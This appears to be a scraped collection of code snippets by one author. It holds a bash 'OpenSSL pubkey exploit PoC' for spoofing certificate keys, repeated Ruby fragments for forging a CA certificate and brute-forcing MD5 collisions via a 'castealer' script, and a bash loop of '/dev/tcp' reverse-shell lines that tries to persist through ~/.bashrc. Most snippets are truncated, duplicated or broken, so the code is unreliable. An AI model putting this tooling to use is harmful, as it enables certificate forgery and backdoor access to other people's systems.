gdisneyleugers

#!/bin/bash
echo "Openssl Pubkey exploit PoC"
echo "usage: keyspoof cert.crt spoof.key"
openssl x509 -in $1 -pubkey -noout > $2
openssl genrsa 2048 >> $2
openssl rsa -in $2 -out $2
echo "Cert Public Key: "
openssl x509 -in $1 -pubkey -noout
echo "PoC Spoof: "
openssl rsa -in $2  -pubout

gdisneyleugers

require 'rubygems'
require 'openssl'
require 'digest/md5'
key = OpenSSL::PKey::RSA.new(2048)
cipher = OpenSSL::Cipher::AES.new(256, :CBC) 
ctx = OpenSSL::SSL::SSLContext.new
puts "Spoof must be in DER format and saved as root.cer"
raw = File.read "root.cer"
cert = OpenSSL::X509::Certificate.new raw
cert.version = 2

gdisneyleugers

require 'rubygems'
require 'openssl'
require 'digest/md5'
key = OpenSSL::PKey::RSA.new(2048)
cipher = OpenSSL::Cipher::AES.new(256, :CBC) 
ctx = OpenSSL::SSL::SSLContext.new
raw = File.read "root.cer"
cert = OpenSSL::X509::Certificate.new raw
cert.version = 2
ef = OpenSSL::X509::ExtensionFactory.new

gdisneyleugers

require 'rubygems'
require 'openssl'
require 'digest/md5'
key = OpenSSL::PKey::RSA.new(2048)
cipher = OpenSSL::Cipher::AES.new(256, :CBC) 
ctx = OpenSSL::SSL::SSLContext.new
raw = File.read "root.cer"
cert = OpenSSL::X509::Certificate.new raw
cert.version = 2
ef = OpenSSL::X509::ExtensionFactory.new

gdisneyleugers

require 'rubygems'
require 'openssl'
require 'digest/md5'
key = OpenSSL::PKey::RSA.new(2048)
cipher = OpenSSL::Cipher::AES.new(256, :CBC) 
ctx = OpenSSL::SSL::SSLContext.new
raw = File.read "root.cer"
cert = OpenSSL::X509::Certificate.new raw
cert.version = 2
ef = OpenSSL::X509::ExtensionFactory.new

gdisneyleugers

require 'rubygems'
require 'digest/md5'
require 'ruby-progressbar'
puts "Certificate Hash Collision"
puts "By G.Disney-Leugers"
puts "Warning this tool only works with DER encoded certificates"
puts "Please save CA to spoof root.cer"
$i = {} 

for $i in 1..99999

gdisneyleugers

require 'rubygems'
require 'openssl'
require 'digest/md5'
key = OpenSSL::PKey::RSA.new(2048)
cipher = OpenSSL::Cipher::AES.new(256, :CBC) 
ctx = OpenSSL::SSL::SSLContext.new
raw = File.read "root.cer"
cert = OpenSSL::X509::Certificate.new raw
cert.version = 2
ef = OpenSSL::X509::ExtensionFactory.new

gdisneyleugers

require 'rubygems'
require 'digest/md5'
puts "Warning this tool only works with DER encoded certificates"
puts "Please save CA to spoof root.cer"
$i = {}
for $i in 1..99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
	system("ruby castealer.rb")
	puts "==== Running Collision ===="
printf "Root: "	
a = puts Digest::MD5.hexdigest(File.read('root.cer'))

gdisneyleugers

require 'rubygems'
require 'openssl'
require 'digest/md5'
key = OpenSSL::PKey::RSA.new(2048)
cipher = OpenSSL::Cipher::AES.new(256, :CBC) 
ctx = OpenSSL::SSL::SSLContext.new
raw = File.read "root.cer"
cert = OpenSSL::X509::Certificate.new raw
cert.not_before = Time.now
cert.not_after = Time.now + 365+365+365+365 * 24 * 60 * 60

gdisneyleugers

#!/bin/bash
trap 'INT'
for (( ; ; ))
do
trap 'HUP'
touch /dev/tcp
/bin/bash -i > /dev/tcp 0<&1 2>&1 & >> /tmp/$RANDOM
touch /tmp/$RANDOM
echo "/bin/bash -i > /dev/tcp/ 0<&1 2>&1 & >> /tmp/$RANDOM & echo tty1 > /dev/tty1 & echo /tmp/$RANOM >> ~/.bashrc" >> /tmp/$RANDOM
chmod u+x /tmp/*